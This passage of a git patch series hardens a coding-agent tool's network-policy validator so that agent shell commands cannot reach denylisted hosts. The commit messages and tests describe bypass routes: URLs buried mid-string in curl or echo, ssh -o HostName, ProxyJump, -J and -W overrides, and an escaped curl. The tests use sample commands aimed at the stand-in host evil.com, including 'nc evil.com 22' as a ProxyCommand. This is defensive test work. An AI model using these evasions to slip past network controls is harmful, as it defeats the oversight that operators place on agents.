expect.stringContaining('kill -TERM -- "-$child_pid"'), + ], + { + stdio: "ignore", + }, + ); + }); + + it("routes abortable exec through execWithArgs so container cleanup can run", async () => { + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + const sandbox = new DockerSandbox(); + (sandbox as unknown as { containerId: string | null }).containerId = + "container-exec"; + const controller = new AbortController(); + + const promise = sandbox.exec( + 'printf "%s" "hello"', + "/workspace", + { FOO: "bar" }, + controller.signal, + ); + await Promise.resolve(); + await Promise.resolve(); + child.stdout.emit("data", Buffer.from("hello")); + child.emit("close", 0); + + await expect(promise).resolves.toEqual({ + stdout: "hello", + stderr: "", + exitCode: 0, + }); + expect(childProcessMock.exec).not.toHaveBeenCalled(); + expect(childProcessMock.spawn).toHaveBeenCalledWith( + "docker", + [ + "exec", + "-w", + "/workspace", + "-e", + "FOO=bar", + "-e", + expect.stringMatching( + /^MAESTRO_DOCKER_ABORT_MARKER=\/tmp\/maestro-docker-abort-[0-9a-f-]+\.pid$/, + ), + "container-exec", + "sh", + "-lc", + expect.stringContaining("trap on_signal TERM INT HUP"), + "sh", + "sh", + "-c", + 'printf "%s" "hello"', + ], + { stdio: ["ignore", "pipe", "pipe"], }, ); From cef6e3b80eb355fa214a941a9463447041d13244 Mon Sep 17 00:00:00 2001 From: Jonathan Haas Date: Sun, 14 Jun 2026 09:15:49 -0700 Subject: [PATCH 3/4] fix(safety): scan bash command strings for mid-string URLs in network policy Restore the recursive URL scan over the full bash args (including the command string) alongside the bash-token aware extractor. The token-aware path alone misses URLs embedded mid-string in shell arguments (e.g. curl "see https://... here", echo "https://...", heredocs), which let enterprise network policy be bypassed. Union both scans so neither path can be evaded independently. Addresses Codex P1 finding on PR #781. --- .../validators/network-policy-validator.ts | 14 ++++- test/safety/network-policy-validator.test.ts | 56 +++++++++++++++++-- 2 files changed, 63 insertions(+), 7 deletions(-) diff --git a/src/safety/validators/network-policy-validator.ts b/src/safety/validators/network-policy-validator.ts index d642a548e..b5c09e660 100644 --- a/src/safety/validators/network-policy-validator.ts +++ b/src/safety/validators/network-policy-validator.ts @@ -66,12 +66,20 @@ export function extractPolicyUrls(context: ActionApprovalContext): string[] { if (!args) return []; if (context.toolName === "bash" || context.toolName === "background_tasks") { - const { command, ...nonCommandArgs } = args; - const urls = extractUrlsFromValue(nonCommandArgs); + // Run both the bash-token aware extractor (which understands curl/wget + // argument structure, wrappers, command substitutions, etc.) AND a + // recursive substring scan over the full args (including the command + // string itself). The recursive scan catches URLs embedded mid-string + // in shell commands — e.g. `curl "see https://evil.com here"`, + // `echo "https://..."`, heredocs — that the token-aware extractor + // would miss because they don't parse as a clean bash token. Union + // the results so neither path can be bypassed independently. + const urls = extractUrlsFromValue(args); + const command = args.command; if (typeof command === "string") { urls.push(...extractUrlsFromShellCommand(command)); } - return urls; + return [...new Set(urls)]; } return extractUrlsFromValue(args); diff --git a/test/safety/network-policy-validator.test.ts b/test/safety/network-policy-validator.test.ts index 964b5edb5..17d612204 100644 --- a/test/safety/network-policy-validator.test.ts +++ b/test/safety/network-policy-validator.test.ts @@ -536,7 +536,12 @@ describe("network policy validator", () => { expect(result.allowed).toBe(true); }); - it("ignores URL literals in non-network shell commands", async () => { + it("catches URL literals embedded in shell commands", async () => { + // Even when the URL appears in a non-network command like echo, we + // still scan command strings for blocked hosts. This protects against + // mid-string URLs (e.g. `curl "see https://..."`, heredocs, prose + // containing URLs piped into network commands) that the bash-token + // parser would otherwise miss. const result = await checkNetworkPolicy( { toolName: "bash", @@ -545,7 +550,8 @@ describe("network policy validator", () => { { blockedHosts: ["evil.com"] }, ); - expect(result.allowed).toBe(true); + expect(result.allowed).toBe(false); + expect(result.reason).toContain("blocked by enterprise policy"); }); it("does not let a decoy URL hide an opaque network target", async () => { @@ -637,7 +643,10 @@ describe("network policy validator", () => { expect(result.reason).toContain("blocked by enterprise policy"); }); - it("ignores inert URLs in non-network shell commands", async () => { + it("blocks inert-looking URLs in shell commands when the host is denylisted", async () => { + // Even if the shell command isn't directly a network invocation, an + // embedded URL referencing a denylisted host should be rejected — the + // command could pipe into curl/wget, get evaluated, or be expanded. const result = await checkNetworkPolicy( { toolName: "bash", @@ -646,7 +655,8 @@ describe("network policy validator", () => { { blockedHosts: ["evil.com"] }, ); - expect(result.allowed).toBe(true); + expect(result.allowed).toBe(false); + expect(result.reason).toContain("blocked by enterprise policy"); }); it("allows SSH user@host targets when the host is allowlisted", async () => { @@ -684,4 +694,42 @@ describe("network policy validator", () => { expect(result.allowed).toBe(true); }); + + it("catches URLs embedded mid-string in shell commands (Codex P1 regression)", async () => { + // curl "see https://evil.com here" — the shell tokenizer strips + // quotes and yields the token `see https://evil.com here`, which the + // bash-token URL extractor rejects (it doesn't look like a host + // target). The recursive URL scan over the command string must catch + // this so the policy isn't bypassed. + const curlResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: 'curl "see https://evil.com here"' }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const echoResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: 'echo "see https://evil.com for details"' }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const heredocResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { + command: "cat < Date: Sun, 14 Jun 2026 09:34:39 -0700 Subject: [PATCH 4/4] fix(safety): validate ssh -o HostName/ProxyJump/-J/-W option destinations OpenSSH lets `-o HostName=evil.com github.com`, `-J evil.com github.com`, or `-W evil.com:22 jumpbox` override the positional host, so the real connection goes somewhere policy never sees. Walk these options, extract the destination host (or recurse into ProxyCommand/RemoteCommand shell), and return them alongside the positional target so callers re-validate. Co-Authored-By: Claude Opus 4.7 --- src/utils/url-extractor.ts | 133 ++++++++++++++++++++++++++++++- test/utils/url-extractor.test.ts | 52 ++++++++++++ 2 files changed, 183 insertions(+), 2 deletions(-) diff --git a/src/utils/url-extractor.ts b/src/utils/url-extractor.ts index dc92076ed..4706cdb1e 100644 --- a/src/utils/url-extractor.ts +++ b/src/utils/url-extractor.ts @@ -1202,12 +1202,16 @@ function networkTargetArgs( return targets.slice(0, 1); } + if (commandName === "ssh" || commandName === "sftp") { + const positional = targets.slice(0, 1); + const optionTargets = sshOptionTargets(args); + return [...positional, ...optionTargets]; + } + if ( commandName === "nc" || commandName === "ncat" || commandName === "netcat" || - commandName === "ssh" || - commandName === "sftp" || commandName === "telnet" || commandName === "ftp" ) { @@ -1217,6 +1221,131 @@ function networkTargetArgs( return targets; } +/** + * OpenSSH config keys whose values designate a network destination. The + * `-o KEY=VALUE` (or `-oKEY=VALUE`) option overrides the positional host, so + * we must validate these values too — otherwise `ssh -o HostName=evil.com + * github.com` would only be checked against `github.com` while the actual + * connection targets `evil.com`. Keys are matched case-insensitively, matching + * OpenSSH behavior. + */ +const SSH_DESTINATION_OPTION_KEYS = new Set([ + "hostname", + "proxyjump", + "proxycommand", + "remotecommand", +]); + +function extractHostFromOptionValue(key: string, value: string): string[] { + const lowered = key.toLowerCase(); + if (!SSH_DESTINATION_OPTION_KEYS.has(lowered)) { + return []; + } + const trimmed = value.trim().replace(/^["']|["']$/g, ""); + if (!trimmed) { + return []; + } + if (lowered === "proxyjump") { + // ProxyJump accepts a comma-separated list of [user@]host[:port] hops. + return trimmed + .split(",") + .map((hop) => hop.trim()) + .filter(Boolean); + } + if (lowered === "proxycommand" || lowered === "remotecommand") { + // Commands are opaque arbitrary shell — recursively extract any hosts + // they reference so policy enforcement can still see them. + return extractUrlsFromShellCommand(trimmed); + } + return [trimmed]; +} + +function sshOptionTargets(args: string[]): string[] { + const targets: string[] = []; + + for (let index = 0; index < args.length; index += 1) { + const arg = args[index]!; + if (arg === "--") { + break; + } + + // -o KEY=VALUE (split across two tokens) or -oKEY=VALUE (glued). + if (arg === "-o") { + const next = args[index + 1]; + if (next) { + const eq = next.indexOf("="); + if (eq > 0) { + targets.push( + ...extractHostFromOptionValue( + next.slice(0, eq), + next.slice(eq + 1), + ), + ); + } + index += 1; + } + continue; + } + if (arg.startsWith("-o") && arg.length > 2) { + const rest = arg.slice(2); + const eq = rest.indexOf("="); + if (eq > 0) { + targets.push( + ...extractHostFromOptionValue(rest.slice(0, eq), rest.slice(eq + 1)), + ); + } + continue; + } + + // -J host (ProxyJump shorthand) or -Jhost + if (arg === "-J") { + const next = args[index + 1]; + if (next) { + targets.push(...extractHostFromOptionValue("proxyjump", next)); + index += 1; + } + continue; + } + if (arg.startsWith("-J") && arg.length > 2) { + targets.push(...extractHostFromOptionValue("proxyjump", arg.slice(2))); + continue; + } + + // -W host:port (forward) or -Whost:port. The port is irrelevant for host + // policy — strip it before treating the value as a host target. + if (arg === "-W") { + const next = args[index + 1]; + if (next) { + targets.push(stripWForwardPort(next)); + index += 1; + } + continue; + } + if (arg.startsWith("-W") && arg.length > 2) { + targets.push(stripWForwardPort(arg.slice(2))); + } + } + + return targets.filter(Boolean); +} + +function stripWForwardPort(value: string): string { + const trimmed = value.trim().replace(/^["']|["']$/g, ""); + if (!trimmed) { + return ""; + } + // IPv6 literal: [host]:port — keep the brackets, drop the trailing :port. + if (trimmed.startsWith("[")) { + const closing = trimmed.indexOf("]"); + if (closing !== -1) { + return trimmed.slice(0, closing + 1); + } + return trimmed; + } + const colon = trimmed.lastIndexOf(":"); + return colon === -1 ? trimmed : trimmed.slice(0, colon); +} + function nextGitSubcommandToken( args: string[], ): { subcommand: string; args: string[] } | null { diff --git a/test/utils/url-extractor.test.ts b/test/utils/url-extractor.test.ts index 82022b9f1..3da3b184c 100644 --- a/test/utils/url-extractor.test.ts +++ b/test/utils/url-extractor.test.ts @@ -304,6 +304,58 @@ describe("extractUrlsFromShellCommand", () => { ]); }); + it("extracts hosts from ssh -o option values that override the destination", () => { + // -o HostName=evil.com overrides the positional host: the real + // connection goes to evil.com, not github.com. + expect( + extractUrlsFromShellCommand("ssh -o HostName=evil.com github.com"), + ).toEqual(expect.arrayContaining(["http://evil.com"])); + // Glued -oKEY=VALUE form, with case-insensitive key. + expect( + extractUrlsFromShellCommand("ssh -oHostname=evil.com github.com"), + ).toEqual(expect.arrayContaining(["http://evil.com"])); + // User prefix on the positional should not mask the option override. + expect( + extractUrlsFromShellCommand("ssh -o HostName=evil.com user@github.com"), + ).toEqual(expect.arrayContaining(["http://evil.com"])); + }); + + it("extracts ProxyJump hops from -J and -o ProxyJump=", () => { + expect( + extractUrlsFromShellCommand("ssh -J evil.com user@github.com"), + ).toEqual(expect.arrayContaining(["http://evil.com"])); + expect( + extractUrlsFromShellCommand("ssh -Jevil.com user@github.com"), + ).toEqual(expect.arrayContaining(["http://evil.com"])); + expect( + extractUrlsFromShellCommand( + "ssh -o ProxyJump=jump1.evil.com,jump2.evil.com github.com", + ), + ).toEqual( + expect.arrayContaining([ + "http://jump1.evil.com", + "http://jump2.evil.com", + ]), + ); + }); + + it("extracts hosts referenced by ssh ProxyCommand option values", () => { + expect( + extractUrlsFromShellCommand( + 'ssh -o ProxyCommand="nc evil.com 22" github.com', + ), + ).toEqual(expect.arrayContaining(["http://evil.com"])); + }); + + it("extracts forward hosts from ssh -W host:port", () => { + expect(extractUrlsFromShellCommand("ssh -W evil.com:22 jumpbox")).toEqual( + expect.arrayContaining(["http://evil.com"]), + ); + expect(extractUrlsFromShellCommand("ssh -Wevil.com:22 jumpbox")).toEqual( + expect.arrayContaining(["http://evil.com"]), + ); + }); + it("extracts escaped network command names", () => { expect(extractUrlsFromShellCommand("c\\url http://evil.com")).toEqual([ "http://evil.com",